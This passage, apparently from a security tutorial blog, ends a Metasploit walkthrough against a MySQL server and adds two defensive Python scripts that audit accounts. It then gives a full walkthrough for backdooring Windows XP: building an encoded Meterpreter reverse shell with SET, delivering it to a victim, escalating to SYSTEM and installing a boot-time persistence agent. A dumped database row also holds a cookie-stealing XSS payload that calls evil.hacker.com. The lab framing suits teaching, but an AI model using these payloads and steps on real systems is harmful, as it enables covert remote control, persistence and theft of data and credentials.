<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] The following users have CREATE USER Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have RELOAD Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have SHUTDOWN Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have SUPER Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have FILE Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following users have PROCESS Privilege:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following accounts have privileges to the mysql database:</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: localhost</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: 127.0.0.1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: ::1</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] The following accounts are not restricted by source:</span><br />
<span style="background-color: #fce5cd;">[*] User: anon@localhost Host: %</span><br />
<span style="background-color: #fce5cd;">[*] User: root Host: %</span><br />
<span style="background-color: #fce5cd;">[*] User: shabbir Host: %</span><br />
<span style="background-color: #fce5cd;">[*] Auxiliary module execution completed</span><br />
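The hash dump in step 4 and the enumeration in step 5 together list what a defender should be checking on their own server: the same hash under two usernames (a shared password), accounts whose Host is %, a root account reachable from any host, failed logins not being logged, and no TLS. The script below is an added example (not the post's or Metasploit's code) that audits rows from SELECT User, Host, Password FROM mysql.user plus a few SHOW VARIABLES values and emits remediation SQL; the rows and variables are constructed to mirror this post's output, and the anonymous ''@'localhost' row is added only to exercise that check.<br />

```python
# Constructed rows in (User, Host, Password) order, mirroring the mysql_enum
# output above; the anonymous ''@'localhost' row is added to exercise that check.
USER_ROWS = [
    ("root", "localhost", "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"),
    ("root", "127.0.0.1", "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"),
    ("root", "::1", "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"),
    ("shabbir", "%", "*8A5EC1AC3F305AF2D49B4AC632B4829A9440E667"),
    ("user", "localhost", "*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19"),
    ("anon@localhost", "%", "*2CE4701D02A76C12CD513109CA16967A68B4C23A"),
    ("anon", "localhost", "*2CE4701D02A76C12CD513109CA16967A68B4C23A"),
    ("anon", "192.168.122.%", "*2CE4701D02A76C12CD513109CA16967A68B4C23A"),
    ("root", "%", "*01A6717B58FF5C7EAFFF6CB7C96F7428EA65FE4C"),
    ("", "localhost", ""),
]

# Constructed subset of SHOW VARIABLES matching the enumerator's findings
# (logins not logged, local file loading on, no TLS).
SERVER_VARS = {
    "general_log": "OFF",
    "log_warnings": "1",
    "local_infile": "ON",
    "have_ssl": "DISABLED",
    "old_passwords": "OFF",
}

ADMIN_USERS = {"root"}  # accounts that must never be reachable from '%'


def audit_accounts(rows):
    """Return a list of (severity, message) findings for mysql.user rows."""
    findings = []
    users_by_hash = {}
    for user, host, pw in rows:
        if user == "":
            findings.append(("HIGH", f"anonymous account ''@'{host}'"))
        if pw == "":
            findings.append(("HIGH", f"empty password for '{user}'@'{host}'"))
        elif not (pw.startswith("*") and len(pw) == 41):
            # a 16-character hash is the pre-4.1 format, which is trivially reversible
            findings.append(("HIGH", f"pre-4.1 password hash for '{user}'@'{host}'"))
        if host == "%":
            severity = "HIGH" if user in ADMIN_USERS else "MEDIUM"
            findings.append((severity, f"'{user}'@'%' accepts logins from any host"))
        elif "%" in host:
            findings.append(("LOW", f"'{user}'@'{host}' uses a host wildcard"))
        if pw:
            users_by_hash.setdefault(pw, set()).add(user)
    # identical hashes (this scheme has no salt) under different usernames mean a
    # password shared between accounts: one cracked login opens all of them
    for users in users_by_hash.values():
        if len(users) > 1:
            findings.append(("MEDIUM", "password shared by accounts: " + ", ".join(sorted(users))))
    return findings


def audit_variables(variables):
    """Return (severity, message) findings for the settings the enumerator reports."""
    findings = []
    if variables.get("general_log", "OFF") == "OFF" and int(variables.get("log_warnings", "1")) < 2:
        findings.append(("MEDIUM", "failed logins are not logged; set log_warnings=2 so brute force is visible"))
    if variables.get("local_infile") == "ON":
        findings.append(("MEDIUM", "local_infile is ON; disable it unless LOAD DATA LOCAL is required"))
    if variables.get("have_ssl") != "YES":
        findings.append(("MEDIUM", "TLS unavailable; sessions cross the network unencrypted"))
    if variables.get("old_passwords", "OFF") not in ("OFF", "0"):
        findings.append(("HIGH", "old_passwords is set; new passwords get the weak pre-4.1 hash"))
    return findings


def remediation_sql(rows):
    """Return SQL statements that remove the HIGH-severity account findings."""
    statements = []
    for user, host, _pw in rows:
        if user == "" or (user in ADMIN_USERS and host == "%"):
            statements.append(f"DROP USER '{user}'@'{host}';")
    statements.append("FLUSH PRIVILEGES;")
    return statements


if __name__ == "__main__":
    for severity, message in audit_accounts(USER_ROWS) + audit_variables(SERVER_VARS):
        print(f"[{severity}] {message}")
    print("\n".join(remediation_sql(USER_ROWS)))
```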
<br />
<br />
6) <span style="color: blue;">View MySQL Server Database Schema.</span><br />
<br />
<span style="background-color: #fce5cd;">msf > <b>info auxiliary/scanner/mysql/mysql_schemadump </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name: MYSQL Schema Dump</span><br />
<span style="background-color: #fce5cd;"> Module: auxiliary/scanner/mysql/mysql_schemadump</span><br />
<span style="background-color: #fce5cd;"> License: Metasploit Framework License (BSD)</span><br />
<span style="background-color: #fce5cd;"> Rank: Normal</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Provided by:</span><br />
<span style="background-color: #fce5cd;"> theLightCosine <theLightCosine@metasploit.com></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Basic options:</span><br />
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> DISPLAY_RESULTS true yes Display the Results to the Screen</span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> PASSWORD no The password for the specified username</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RHOSTS yes The target address range or CIDR identifier</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> RPORT 3306 yes The target port</span></span><br />
<span style="background-color: #fce5cd;"> THREADS 1 yes The number of concurrent threads</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Description:</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">This module extracts the schema information from a MySQL DB server.</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf > <b>use auxiliary/scanner/mysql/mysql_schemadump </b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>set USERNAME shabbir</b></span><br />
<span style="background-color: #fce5cd;">USERNAME => shabbir</span><br />
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>set PASSWORD shabbir</b></span><br />
<span style="background-color: #fce5cd;">PASSWORD => shabbir</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>set RHOSTS 192.168.122.1</b></span><br />
<span style="background-color: #fce5cd;">RHOSTS => 192.168.122.1</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">msf auxiliary(mysql_schemadump) > <b>run</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><span style="color: red;">[*] Schema stored in: /root/.msf4/loot/20150627113706_default_192.168.122.1_mysql_schema_138881.txt</span></span><br />
<span style="background-color: #fce5cd;">[+] MySQL Server Schema </span><br />
<span style="background-color: #fce5cd;"> Host: 192.168.122.1 </span><br />
<span style="background-color: #fce5cd;"> Port: 3306 </span><br />
<span style="background-color: #fce5cd;"> ====================</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">---</span><br />
<span style="background-color: #fce5cd;">- DBName: mybank</span><br />
<span style="background-color: #fce5cd;"> Tables:</span><br />
<span style="background-color: #fce5cd;"> - TableName: customer</span><br />
<span style="background-color: #fce5cd;"> Columns:</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: loginid</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(50)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: passwd</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(50)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: custname</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(100)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: accountno</span><br />
<span style="background-color: #fce5cd;"> ColumnType: int(11)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: balance</span><br />
<span style="background-color: #fce5cd;"> ColumnType: decimal(10,2)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: address</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(500)</span><br />
<span style="background-color: #fce5cd;"> - ColumnName: mobile</span><br />
<span style="background-color: #fce5cd;"> ColumnType: varchar(50)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] Scanned 1 of 1 hosts (100% complete)</span><br />
<span style="background-color: #fce5cd;">[*] Auxiliary module execution completed</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<br />
<br />
7) <span style="color: blue;">Run SQL Query</span><br />
<br />
<span style="background-color: #fff2cc;">msf auxiliary(mysql_enum) > <b>use auxiliary/admin/mysql/mysql_sql</b></span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>show options</b></span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">Module options (auxiliary/admin/mysql/mysql_sql):</span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fff2cc;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fff2cc;"> <span style="color: red;">PASSWORD no The password for the specified username</span></span><br />
<span style="background-color: #fff2cc;"><span style="color: red;"> RHOST yes The target address</span></span><br />
<span style="background-color: #fff2cc;"> RPORT 3306 yes The target port</span><br />
<span style="background-color: #fff2cc;"> <span style="color: red;"> SQL select version() yes The SQL to execute.</span></span><br />
<span style="background-color: #fff2cc;"><span style="color: red;"> USERNAME no The username to authenticate as</span></span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>set RHOST 192.168.122.1</b></span><span style="background-color: #fff2cc;"> </span><br />
<span style="background-color: #fff2cc;">RHOST => 192.168.122.1</span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>set username shabbir</b></span><br />
<span style="background-color: #fff2cc;">username => shabbir</span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>set password shabbir</b></span><br />
<span style="background-color: #fff2cc;">password => shabbir</span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>set sql select * from mybank.customer</b></span><br />
<span style="background-color: #fff2cc;">sql => select * from mybank.customer</span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">msf auxiliary(mysql_sql) > <b>run</b></span><br />
<span style="background-color: #fff2cc;"><br /></span>
<span style="background-color: #fff2cc;">[*] Sending statement: 'select * from mybank.customer'...</span><br />
<span style="background-color: #fff2cc;">[*] | batul | dahod | batul ben dahod | 1234 | 25000.00 | fdfdfdfdfd | 5454545454 |</span><br />
<span style="background-color: #fff2cc;">[*] | shabbir | shabbir | shabbir rangwala | 1000 | 49000.00 | dkdkdkdkd dkdkdkdkd | 193933030 |</span><br />
<span style="background-color: #fff2cc;">[*] | taher | taher | taher saifee | 2000 | 8000.00 | dddl fkfkfl flflflfll | 122222233 |</span><br />
<span style="background-color: #fff2cc;">[*] | trudy | trudy | trudy chennai | 1050 | 20000.00 | &lt;a href=# onclick="document.location='http://evil.hacker.com/xss.php?c='+escape(document.cookie);"My Address&lt;/a&gt; | 2345678531 |</span><br />
<span style="background-color: #fff2cc;">[*] Auxiliary module execution completed</span><br />
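The accounts that mysql_enum listed above as "not restricted by source" (Host: %) are what let steps 6 and 7 be run against the server from another machine. The following is an added example, not code from the original post or from Metasploit: it re-implements that check offline over a constructed account list (the rows a DBA would get from SELECT User, Host FROM mysql.user) and emits the hardening SQL for review; APP_SERVER_IP_HERE is a placeholder for the one host the application really connects from.<br />

```python
"""Audit mysql.user rows for anonymous and source-unrestricted accounts.

Added example, not part of the original post: it re-implements, offline and
over a constructed account list, the check mysql_enum reported above as
"accounts are not restricted by source", and prints the hardening statements
a DBA would review. On a live server the rows come from
`SELECT User, Host FROM mysql.user`.
"""
from dataclasses import dataclass

LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}

# Placeholder for the single host (or subnet) the application connects from.
APP_HOST_PLACEHOLDER = "APP_SERVER_IP_HERE"

# Constructed sample mirroring the accounts the module listed above; the
# anonymous account is modelled as MySQL stores it, with an empty User.
SAMPLE_ACCOUNTS = [
    ("root", "localhost"),
    ("root", "127.0.0.1"),
    ("root", "::1"),
    ("root", "%"),
    ("", "localhost"),
    ("shabbir", "%"),
]


@dataclass(frozen=True)
class Finding:
    user: str
    host: str
    issue: str
    fix: str  # SQL statement to review, never to run blindly


def quote_literal(value: str) -> str:
    """Quote a value as a MySQL single-quoted string literal."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def account(user: str, host: str) -> str:
    """Render 'user'@'host' as DROP USER / RENAME USER expect it."""
    return f"{quote_literal(user)}@{quote_literal(host)}"


def is_wildcard_host(host: str) -> bool:
    """An empty Host matches everything; '%' and '_' are LIKE wildcards.

    Partial patterns such as '192.168.1.%' still count: they admit a whole
    subnet rather than one source.
    """
    return host == "" or "%" in host or "_" in host


def audit_accounts(rows) -> list:
    """One Finding per account that is anonymous, reachable from any source,
    or a root login permitted from a non-loopback host."""
    root_has_local = any(u == "root" and h in LOOPBACK_HOSTS for u, h in rows)
    findings = []
    for user, host in rows:
        if user == "":
            findings.append(Finding(user, host, "anonymous account (empty User)",
                                    f"DROP USER {account(user, host)};"))
        elif is_wildcard_host(host):
            if user == "root" and root_has_local:
                # Safe to drop only because a loopback root row remains.
                fix = f"DROP USER {account(user, host)};"
            else:
                target = "localhost" if user == "root" else APP_HOST_PLACEHOLDER
                fix = (f"RENAME USER {account(user, host)} "
                       f"TO {account(user, target)};")
            findings.append(Finding(user, host, "not restricted by source", fix))
        elif user == "root" and host not in LOOPBACK_HOSTS:
            findings.append(Finding(user, host, "root login allowed from a remote host",
                                    f"DROP USER {account(user, host)};"))
    return findings


def hardening_script(rows) -> str:
    """Findings rendered as a commented SQL script for review."""
    lines = []
    for f in audit_accounts(rows):
        lines.append(f"-- {account(f.user, f.host)}: {f.issue}")
        lines.append(f.fix)
    return "\n".join(lines)


if __name__ == "__main__":
    print(hardening_script(SAMPLE_ACCOUNTS))
```

Run the generated statements only after confirming which host the application server actually uses, then FLUSH PRIVILEGES.<br />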
<br />
<br /></div>
Shabbir Rangwalahttp://www.blogger.com/profile/06038985133173388069noreply@blogger.com4tag:blogger.com,1999:blog-1164086323266606043.post-88380489312226163232015-06-25T15:10:00.000+05:302015-06-25T22:23:56.216+05:30Install Backdoor in Windows XP using Metasploit in Kali Linux<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
We have the following scenario:<br />
<br />
Victim (Windows XP Machine) IP Address: 192.168.1.2<br />
<br />
Attacker (Kali Linux Machine) IP Address: 192.168.1.3<br />
<br />
We will use the Social Engineering Toolkit in Kali Linux to generate a malicious executable payload that, when run on the Windows XP machine, gives the attacker complete access to the victim's machine. The attacker will then use Metasploit to install a permanent backdoor on the victim machine.<br />
<br />
We will perform the following steps:<br />
1) Create malicious payload<br />
2) Give the payload to the Victim. <br />
3) Create listener (for the payload) on the Attacker on port 443.<br />
4) When the user executes the payload, the Victim connects to the Attacker on port 443.<br />
5) Escalate privilege to Windows user SYSTEM. <br />
6) Install backdoor on the Victim.<br />
7) Create listener (for the backdoor) on the Attacker on port 80.<br />
8) Whenever the Victim boots, it automatically connects to the Attacker. <br />
<br />
Perform the following steps on the Attacker (Kali Linux) Machine:<br />
<br />
1) <span style="color: blue;">Create malicious executable payload.</span><br />
1.1) Start Social Engineering Toolkit.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>setoolkit</b></span><br />
<br />
1.2) Select option <span style="color: red;">1)</span> <span style="color: red;">Social Engineering Attacks</span><br />
<span style="background-color: #fce5cd;">set> <b>1</b></span><br />
<br />
1.3) Select option<span style="color: red;"> 4) Create a Payload and Listener</span><span style="color: red;"></span><br />
<span style="background-color: #fce5cd;">set> <b>4</b></span><br />
<span style="background-color: #fce5cd;">set:payloads> Enter the IP address for the payload (reverse):<b>192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">What payload do you want to generate:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name: Description:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker</span></span><br />
<span style="background-color: #fce5cd;"> 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker</span><br />
<span style="background-color: #fce5cd;"> 4) Windows Bind Shell Execute payload and create an accepting port on remote system</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">set:payloads><b>2</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Select one of the below, 'backdoored executable' is typically the best. However,</span><br />
<span style="background-color: #fce5cd;">most still get picked up by AV. You may need to do additional packing/crypting</span><br />
<span style="background-color: #fce5cd;">in order to get around basic AV detection.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> 1) shikata_ga_nai</span><br />
<span style="background-color: #fce5cd;"> 2) No Encoding</span><br />
<span style="background-color: #fce5cd;"> 3) Multi-Encoder</span><br />
<span style="background-color: #fce5cd;"> 4) Backdoored Executable</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">set:encoding><b>1</b></span><br />
<span style="background-color: #fce5cd;">set:payloads> PORT of the listener [443]:</span><br />
<span style="background-color: #fce5cd;">[-] Encoding the payload 4 times. [-]</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 314 (iteration=1)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 341 (iteration=2)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 368 (iteration=3)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] x86/shikata_ga_nai succeeded with size 395 (iteration=4)</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] <span style="color: red;">Your payload is now in the root directory of SET as payload.exe</span></span><br />
<span style="background-color: #fce5cd;">[-] The payload can be found in the SET home directory.</span><br />
<span style="background-color: #fce5cd;">set> Start the listener now? [yes|no]: <b>no</b></span><br />
<br />
<br />
2) <span style="color: blue;">We need to deliver this payload file <span style="color: red;">/usr/share/set/payload.exe</span> to the Victim by social media, e-mail, an upload to a server, or any other means. </span><br />
<br />
<br />
3) <span style="color: blue;">Set up a handler on the Attacker machine using Metasploit.</span><br />
3.1) Start the services.<br />
<span style="background-color: #fce5cd;">root@kali:~# <b>service postgresql start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting PostgreSQL 9.1 database server: main.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">root@kali:~# <b>service metasploit start</b></span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit rpc server: prosvc.</span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit web server: thin.</span><br />
<span style="background-color: #fce5cd;">[ ok ] Starting Metasploit worker: worker.</span><br />
<br />
3.2) Start metasploit console. <br />
<span style="background-color: #fce5cd;">root@kali:~# <b>msfconsole</b></span><br />
<span style="background-color: #fce5cd;">msf ></span><br />
<br />
3.3) Select exploit. <br />
<span style="background-color: #fce5cd;">msf > <b>use exploit/multi/handler</b></span><br />
<br />
3.4) Select payload.<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set payload windows/meterpreter/reverse_tcp</b></span><br />
<span style="background-color: #fce5cd;">payload => windows/meterpreter/reverse_tcp</span><br />
<br />
3.5) View options<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>show options</b></span><br />
<span style="background-color: #fce5cd;">Module options (exploit/multi/handler):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Payload options (windows/meterpreter/reverse_tcp):</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Name Current Setting Required Description</span><br />
<span style="background-color: #fce5cd;"> ---- --------------- -------- -----------</span><br />
<span style="background-color: #fce5cd;"> EXITFUNC process yes Exit technique (accepted: seh, thread, process, none)</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;">LHOST yes The listen address</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> LPORT 4444 yes The listen port</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">Exploit target:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> Id Name</span><br />
<span style="background-color: #fce5cd;"> -- ----</span><br />
<span style="background-color: #fce5cd;"> 0 Wildcard Target</span><br />
<span style="background-color: #fce5cd;"><br /></span>
3.6) Set options<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LHOST 192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LHOST => 192.168.1.3</span></span><br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>set LPORT 443</b></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;">LPORT => 443</span></span><br />
<br />
3.7) Execute exploit<br />
<span style="background-color: #fce5cd;">msf exploit(handler) > <b>exploit</b></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">[*] <span style="color: red;">Started reverse handler on 192.168.1.3:443 </span></span><br />
<span style="background-color: #fce5cd;">[*] Starting the payload handler...</span><br />
<br />
<br />
4) <span style="color: blue;">As soon as the victim runs the executable file, the payload will make a connection to the attacker system, giving the attacker complete control of the victim machine.</span><br />
<br />
<span style="background-color: #fce5cd;">[*] Sending stage (769536 bytes) to 192.168.1.2</span><br />
<span style="background-color: #fce5cd;">[*]<span style="color: red;"> Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.2:1038)</span> at 2015-06-25 06:52:57 +0530</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>sysinfo</b></span><br />
<span style="background-color: #fce5cd;">Computer : WINSETU</span><br />
<span style="background-color: #fce5cd;">OS : Windows XP (Build 2600, Service Pack 2).</span><br />
<span style="background-color: #fce5cd;">Architecture : x86</span><br />
<span style="background-color: #fce5cd;">System Language : en_US</span><br />
<span style="background-color: #fce5cd;">Meterpreter : x86/win32</span><br />
<span style="background-color: #fce5cd;">meterpreter > </span><br />
<br />
5) <span style="color: blue;">Escalate privilege</span><br />
<br />
<span style="background-color: #fce5cd;">meterpreter > <b>getuid</b></span><br />
<span style="background-color: #fce5cd;">Server username: <span style="color: red;">WINSETU\shabbir</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>getsystem</b></span><br />
<span style="background-color: #fce5cd;">...got system (via technique 1).</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>getuid</b></span><br />
<span style="background-color: #fce5cd;">Server username: <span style="color: red;">NT AUTHORITY\SYSTEM</span></span><br />
<br />
<br />
6) <span style="color: blue;">Install backdoor on the victim machine.</span><br />
<br />
<span style="background-color: #fce5cd;">meterpreter > <b>run persistence -h</b></span><br />
<span style="background-color: #fce5cd;">Meterpreter Script for creating a persistent backdoor on a target host.</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">OPTIONS:</span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"> -A Automatically start a matching multi/handler to connect to the agent</span><br />
<span style="background-color: #fce5cd;"> -L <opt> Location in target host where to write payload to, if none %TEMP% will be used.</span><br />
<span style="background-color: #fce5cd;"> -P <opt> Payload to use, default is windows/meterpreter/reverse_tcp.</span><br />
<span style="background-color: #fce5cd;"> -S Automatically start the agent on boot as a service (with SYSTEM privileges)</span><br />
<span style="background-color: #fce5cd;"> -T <opt> Alternate executable template to use</span><br />
<span style="background-color: #fce5cd;"> -U Automatically start the agent when the User logs on</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> -X Automatically start the agent when the system boots</span></span><br />
<span style="background-color: #fce5cd;"> -h This help menu</span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> -i <opt> The interval in seconds between each connection attempt</span></span><br />
<span style="background-color: #fce5cd;"><span style="color: red;"> -p <opt> The port on the remote host where Metasploit is listening</span></span><br />
<span style="background-color: #fce5cd;"> <span style="color: red;"> -r <opt> The IP of the system running Metasploit listening for the connect back</span></span><br />
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;"><br /></span>
<span style="background-color: #fce5cd;">meterpreter > <b>run persistence -X -i 10 -p 80 -r 192.168.1.3</b></span><br />
<span style="background-color: #fce5cd;">[*] Running Persistance Script</span><br />
<span style="background-color: #fce5cd;">[*] Resource file for cleanup created at /root/.msf4/logs/persistence/WINSETU_20150625.1651/WINSETU_20150625.1651.rc</span><br />
<span style="background-color: #fce5cd;">[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=80</span><br />
<span style="background-color: #fce5cd;">[*] Persistent agent script is 148439 bytes long</span><br />
<span style="background-color: #fce5cd;">[+] Persistent Script written to C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs</span><br />
<span style="background-color: #fce5cd;">[*] Executing script C:\DOCUME~1\shabbir\LOCALS~1\Temp\RXdYyZmSEBJVd.vbs</span><br />
<span style="background-color: #fce5cd;">[+] Agent executed with PID 3648</span><br />
<span style="background-color: #fce5cd;">[*] Installing into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu</span><br />
<span style="background-color: #fce5cd;">[+] Installed into autorun as HKLM\Software\Microsoft\Windows\CurrentVersion\Run\YHxeQVYtYjmIYu</span><br />
<span style="background-color: #fce5cd;">meterpreter > </span><br />
<span style="background-color: #fce5cd;"><br /></span>
<br />
